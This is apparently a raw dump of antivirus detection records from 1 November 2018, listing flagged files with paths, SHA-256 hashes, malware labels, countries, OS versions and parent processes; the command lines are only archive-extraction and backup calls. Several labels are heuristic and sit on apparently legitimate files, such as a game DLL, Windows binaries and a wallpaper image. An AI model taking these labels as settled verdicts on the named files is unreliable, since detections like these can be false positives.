  Row(detection=Row(filename='avscan-20181101-114837-10ea26b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_051aad7c\\AVSCAN-20181101-114053-D04040A0\\AVSCAN-20181101-114837-10EA26B0', filesize=2880000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='c1f581f78fc6cf0303ded2dc948d05d44f46ff1ac0097c4435bed92d9a932172', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:48:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c263a89a34bb9ab689b2855f4cd7cae0d954900bb06e395261afd82052bc2161', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\C263A89A34BB9AB689B2855F4CD7CAE0D954900BB06E395261AFD82052BC2161', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c263a89a34bb9ab689b2855f4cd7cae0d954900bb06e395261afd82052bc2161', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:11:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c2e2d2c07098f50685d559a6286ff40d2261d831260b6737d2bfe2dffc72f3dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\C2E2D2C07098F50685D559A6286FF40D2261D831260B6737D2BFE2DFFC72F3DD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c2e2d2c07098f50685d559a6286ff40d2261d831260b6737d2bfe2dffc72f3dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:26:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c364b5f31a3373443bd737abb4764e6c7955a749855a497937a97c9e5f49d65e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C364B5F31A3373443BD737ABB4764E6C7955A749855A497937A97C9E5F49D65E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c364b5f31a3373443bd737abb4764e6c7955a749855a497937a97c9e5f49d65e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:08:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='package_764_xml.js.zip', filepath='F:\\Backup\\LwD\\Praxis\\DConcept\\HtmlHelp\\XCONCEPT_HILFE\\WHXDATA\\PACKAGE_764_XML.JS.zip', filesize=4000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='c379a71d8903b9ec14591bdb3e85716dcd3cbf55fef97fa614f787c2878b2b7a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\PersBackup\\\\\\\\Tägliche Sicherung.buj\\\\\\" \\\\\\/force \\\\\\/hide \\\\\\/wait:3', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10482688, timestamp='2018-11-01T20:22:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183124-42390bdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183124-42390BDD', filesize=64000, name='VBA/Dldr.Agent.tlcym.#M1.#R1'), hash='c379ce56c97f30e587aef5054ce5a4fd1e1d0d095b6ff80d6b423553ce223850', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rzfo073', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RZFO073', filesize=64000, name='VBA/Dldr.Agent.tlcym.#M1.#R1'), hash='c379ce56c97f30e587aef5054ce5a4fd1e1d0d095b6ff80d6b423553ce223850', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c3a1132288e96fe91a32c23fc02893891960b16442999556138d832d835c4a18', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\C3A1132288E96FE91A32C23FC02893891960B16442999556138D832D835C4A18', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c3a1132288e96fe91a32c23fc02893891960b16442999556138d832d835c4a18', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145539-229c63b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d656672\\AVSCAN-20181101-144434-E2499C00\\AVSCAN-20181101-145539-229C63B9', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:55:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-072241-f74b0f96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e7005a0b\\AVSCAN-20181101-072119-EBE393B5\\AVSCAN-20181101-072241-F74B0F96', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ocs_v71b.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\user\\AppData\\Local\\Temp\\OCS\\ocs_v71b.exe.vir', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:03:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-221038-f54f2776', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181031-205716-48890BCA\\AVSCAN-20181031-221038-F54F2776', filesize=64000, name='TR/Crypt.XPACK.Gen2.#M300.#R100420'), hash='c3f3ba19bedc965c2885dfb09a210f95b83ad33bfc4545cd8ec07062ae42adac', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:10:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-084120-944a1e2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8ed2446\\AVSCAN-20181102-083539-58E69A48\\AVSCAN-20181102-084120-944A1E2E', filesize=8000, name='JS/iFrame.EB.12.#M1.#R1'), hash='c3f7d2a027770c187ee6b34dc76f9baa174b123bc1edd0dbc65745de9da61d97', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='c4242840038e90e0989bfaf60d861bb1e2b10f85a8f7d19b5b05a8c317f3aa82', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T17:22:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='c44bf00a9096001dbacb189645c9ac669ba56d81646d57f83d22c637cdd475e1', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='c44f13f23dc49051f7019146bd18bc757a3db82126eab46def3d50ea5e17a1d8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:49:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c46c4f55575370e282438751bf32315cbc586bb28a4fe859a71414f44dd4ca0f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C46C4F55575370E282438751BF32315CBC586BB28A4FE859A71414F44DD4CA0F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c46c4f55575370e282438751bf32315cbc586bb28a4fe859a71414f44dd4ca0f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:08:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153855-1b4707bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a5d9c17\\AVSCAN-20181101-153508-ED4A8C8B\\AVSCAN-20181101-153855-1B4707BB', filesize=256000, name='TR/Tracur.A.6468.#M1.#R1'), hash='c4e98355b6cd5bb964f22c241bf470433b2385acde1c02395ba9cf73af5ef906', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T19:39:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unityengine.networking.dll', filepath='G:\\Steam\\steamapps\\common\\Streets of Rogue\\StreetsOfRogue_Data\\Managed\\UnityEngine.Networking.dll', filesize=256000, name='HEUR/AGEN.1019617.#M1.#R1'), hash='c4fd73aed6c56d4468b3ae01758909e82a2c5fcee022a8601dc3067725bf2f8d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:44:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204515-8158a535', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6c1aeb49\\AVSCAN-20181101-204500-7E53DB2A\\AVSCAN-20181101-204515-8158A535', filesize=256000, name='HEUR/AGEN.1019617.#M1.#R1'), hash='c4fd73aed6c56d4468b3ae01758909e82a2c5fcee022a8601dc3067725bf2f8d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:45:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='c4fee27785e42c098deb24e573856f51641b42ab3055b0de96a8d8c89f031bfd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190549-f80dc609', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190124-CAF68D09\\AVSCAN-20181101-190549-F80DC609', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deletedoctor.exe', filepath='K:\\HBCD\\Programs\\DELETEDOCTOR.EXE', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3933184, timestamp='2018-11-01T17:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\titip sek yo\\vol2\\instaler\\(D) CD v3_1VI\\Lan\\RealTek\\Setup.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='c53def0da5663ee6911a7a6c16bee144e5691a383f497076593b43727a778697', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\000 Kayu Lapis Indonesia\\Software\\instaler\\(D) CD v3_1VI\\Lan\\RealTek\\Setup.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='c53def0da5663ee6911a7a6c16bee144e5691a383f497076593b43727a778697', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:49:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c544197bbc023222ce81f009c5b069e9da34c8d76bafbc41fd8e21b1477b11ef', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C544197BBC023222CE81F009C5B069E9DA34C8D76BAFBC41FD8E21B1477B11EF', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='c544197bbc023222ce81f009c5b069e9da34c8d76bafbc41fd8e21b1477b11ef', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:52:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c55ef4d34a146adfe370b110ed262eee450cc82a633af4557463508d0e932065.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\27.10.2017-145.available\\Avira\\Others\\PE-detected-Avira\\Adware.CrossRider.fqgns\\c55ef4d34a146adfe370b110ed262eee450cc82a633af4557463508d0e932065.MRG', filesize=2096000, name='Adware/CrossRider.fqgns.#M1.#R1'), hash='c55ef4d34a146adfe370b110ed262eee450cc82a633af4557463508d0e932065', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\28.01.2018-133.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-01T15:54:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c57193f15573e83f389017cf356e4f64a787d7f7842abe054711cc09234d2054', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C57193F15573E83F389017CF356E4F64A787D7F7842ABE054711CC09234D2054', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='c57193f15573e83f389017cf356e4f64a787d7f7842abe054711cc09234d2054', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:52:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c67723641e9ead7dc42aca53cc3f37868cb31438562d2bc2c680fd1651038230', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C67723641E9EAD7DC42ACA53CC3F37868CB31438562D2BC2C680FD1651038230', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c67723641e9ead7dc42aca53cc3f37868cb31438562d2bc2c680fd1651038230', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mau lýl ịch trích ngang.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Mau lýl ịch trích ngang.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c67dfb62ab11a84d52a30b3faf2194c9a8922ec55c681dc2e574787dbf624f5a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161332-e020d3b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161332-E020D3B1', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='c67dfb62ab11a84d52a30b3faf2194c9a8922ec55c681dc2e574787dbf624f5a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nerviosas.exe', filepath='H:\\nerviosas.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='c6d1f31d2a689d0585ffc98ddf7f6e7356b27e24a6faf6b974810e597651f17e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T01:21:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nonod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nonod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c6ff4348c7c546167dfc0abc3d9eac180f3fe77772f4af9d177d56b9e5fa31a5', metadata=Row(cmdline='\\\\\\/Q \\\\\\/W', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\MRT.exe', parentsize=None, timestamp='2018-11-01T14:01:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c6ffd4f3e688eaadae948904295007628b26eedfe29c00cbad7cdf3b420b3cd8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C6FFD4F3E688EAADAE948904295007628B26EEDFE29C00CBAD7CDF3B420B3CD8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c6ffd4f3e688eaadae948904295007628b26eedfe29c00cbad7cdf3b420b3cd8', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcld_tw.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa7148.40047\\馴傑奪模\\gcld_tw.exe', filesize=2752000, name='TR/Agent.tuujo.#M1.#R1'), hash='c76c7d5a7bdb96b83c3702d2947f2e8059ba1a384f168696692d75b77c4fde8a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2235096, timestamp='2018-11-01T07:27:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182343-1c4cd1d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182343-1C4CD1D4', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182320-186de9a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182320-186DE9A8', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182402-1f6399f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182402-1F6399F4', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182618-36805c7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182618-36805C7B', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182642-3a917773', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182642-3A917773', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:44Z'), dt=datetime.date(2018, 11, 1)),
